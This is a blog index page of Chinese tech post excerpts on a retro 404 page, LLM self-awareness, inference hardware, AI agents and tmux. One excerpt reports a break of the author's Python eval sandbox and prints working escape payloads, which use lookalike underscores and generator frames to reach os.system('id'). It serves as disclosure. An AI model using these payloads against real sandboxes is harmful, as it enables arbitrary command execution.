首页和404更新
觉得每年都得折腾一下。 做了个 404 页面 https://est.im/404 老登们一眼就能get到点。00后可能没见过。 哈哈哈,等有空了去做个多语言版本的 😎 可能没折腾过的不知道这玩意是在 shdoclc.dll 里,通过 Reource Hacker 可以提取出来 本来想去 win10 瞻仰一下遗迹,发现 iexplore.exe 直接强行启动 Edge了。搜到个法子可以绕过,新建个 1.vbs Set ie = CreateObject("InternetExplorer.Application") ie.Navigate "about:blank" ie.Visible = 1 然后地址栏输入 res://shdoclc.dll/http_404.htm 。嘿,您猜怎么着,Win10..
更多无用之用——或许LLM真的还不是AGI
之前记录的 安全的Python3沙箱——eval 被人破解了。 [ c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_ ] 或 ( L:=[None], g:=(x.gi_frame.f_back.f_back.f_builtins for x in L), L.clear(), L.append(g), bi:=g.send(None)..
更多发明后训练的人真是天才
有了AI很多东西摸索得比多,也是快速记录一下。 问1:你的 system prompt 里有明确指出你是个 AI 吗 问2:一个 LLM 的 system prompt 如果没显式指出是AI,AI 能发现自己是AI吗? 问3:一个 LLM 的 system prompt 如果没显式指出是AI,pre-train 也把所有明显AI助手的语料删除,RLHF 的时候也不考察AI自我角色定位, AI 能发现自己是AI吗? 问爽之后,综合了一下: 在这个前提下,分为三种情况 - 能自个儿推测出来自己是确切是AI并在pre-train和post-train保持角色一致 - 因为训练语料是人类自然语言,所以直接以为自己完全是真人 - 在上述两者之间摇摆 进而引出一个更深层次的问题,这三种情况,和显式指定自己是AI,..
更多看好 Taalas
可能你还没刷到过 https://chatjimmy.ai 我被它几万 tokens/s 的推理速度震惊了。也在zhihu上翻了不少技术细节讨论。它背后的公司叫 Taalas 号称把 4-bit LLaMA3.2-3B 直接刻电路上,当然很多人第一反应是,这玩意废品啊,模型升级了岂不是硬件就白费了。 但仔细研究,发现这里面另有乾坤。 大模型在显卡VRAM里,70%拿来存静态权重,推理的时候这玩意就一层一层做卷积只读不写,然后30% 才是 KVcache 上下文,又读又写。吞吐频繁 如果你懂一点LLM,那么你应该猜出来了。 聪明人就想到了ROM。类似游戏机里的卡带,插进去 CPU/GPU 能直接访问一块特殊的内存区域。ROM成本比DRAM便宜得多,速度极快,但是只读,烧制一次就成型了。其他部分可以直接上SR..
更多claw会代替员工?
无聊刷到 王自如: agent在本地加数据持久化和永久记忆这三件事是不是就是openclaw(🦞)。🦞,如果用在产业当中的意义是什么? 意味着一个员工在工作电脑上每天做的事情产出了什么东西, 结果有没有价值,都会以记忆的方式存在本地。 而如果时间足够长, 一个员工的工作行为思维方式一定可以通过对话的内容和工作产出进行抽象 化和提炼。 也就是说,假以时日,一个人真正的价值就会完成从个体到数字化资产的转移。 也就是说你就会成为养你的工作🦞的营养员,你是那个营养液。 一旦你的工作模式,你的思维模式被抽象化提炼,那个你抽象完毕了的数据和🦞里边这个东西会成为公司最宝贵的资产, 你则是disposable。 那么如果公司需要新的角度,完全可以把你干掉,换一个新人来。 我对这个看法是,太悲观了。太低估了..
更多tmux enables AIs to operate servers safely
We’ve all seen plenty of horror stories about AI trashing servers. Yet, there are still tedious tasks we’d love for AI to handle. To keep things safe, you have to manually copy-paste back and forth commands and outputs. Yet the current mainstream solutions usually involve "adding another layer": relay IO, intercepting dangerous commands or even using a sm..
更多chat.est.im launches at 3.14
Long over due. But finally, it's here. Last year I saw an interesting thread on V2EX that utilize curl -N to display cool ANSI art, and I wondered how to make it "interactive". After a series of battle with AI coding agents, it's finally done. The project is located at https://chat.est.im/. You can try it with curl -NT. https://chat.est.im/hello. I wrote ..
更多AI 弑父
大型语言模型(LLM)所谓的涌现能力,一般说成是随着模型规模的增长,突然出现新的技能,而非平滑提升。我对此有个疑惑。gpt1 gpt2 规模也涨了,能力在哪里呢? 秘笈 翻很多材料,提到涌现能力示例: 包括 在上下文中学习 (few-shot) 多步逻辑推理(数学/逻辑题) 推断他人意图(心智理论) 使用工具或编程(生成或使用代码) 我又回忆起 ChatGPT 发布那段时间,聊天窗里那个 Linux终端+Python命令行模拟,当时很惊人。这个连续上下文和逻辑推理一致性不可思议的强。 我让 gemini 和 chatgpt 做了一个deep research,我越来越确认,AI能力爆发,也就是所谓的「涌现」有个关键因素:OpenAI和微软合作 我还记得当时有个新闻说微软要造个 DGX V100 集群..
更多Configurable Intelligence
无聊看了下 Language Model Contains Personality Subnetworks ,刚好A社也最近也写了篇The persona selection model,感觉现在讨论LLM的「人格」比较火 先说下这篇论文,它提出,可以做类似「脑前额叶切除」让AI屏蔽一部分人格,不需要 fine-tune,而且就算prompt指定其它人格也无济于事。 不过它搞出来的分类比较喜剧,用的是 MBTI 。测试集是一堆 YES/NO 二元分类 光说「人格」这种问题比较抽象,有哪些应用呢?很遗憾,我对此脑袋哐当一声没太多想法,还是AI提醒了我: 因为是物理mask,所以 jailbreak 变得不太可能了 可以定向优化某些选项。它甚至在 contra.py 里可以设置 mask_gamma 这个..
更多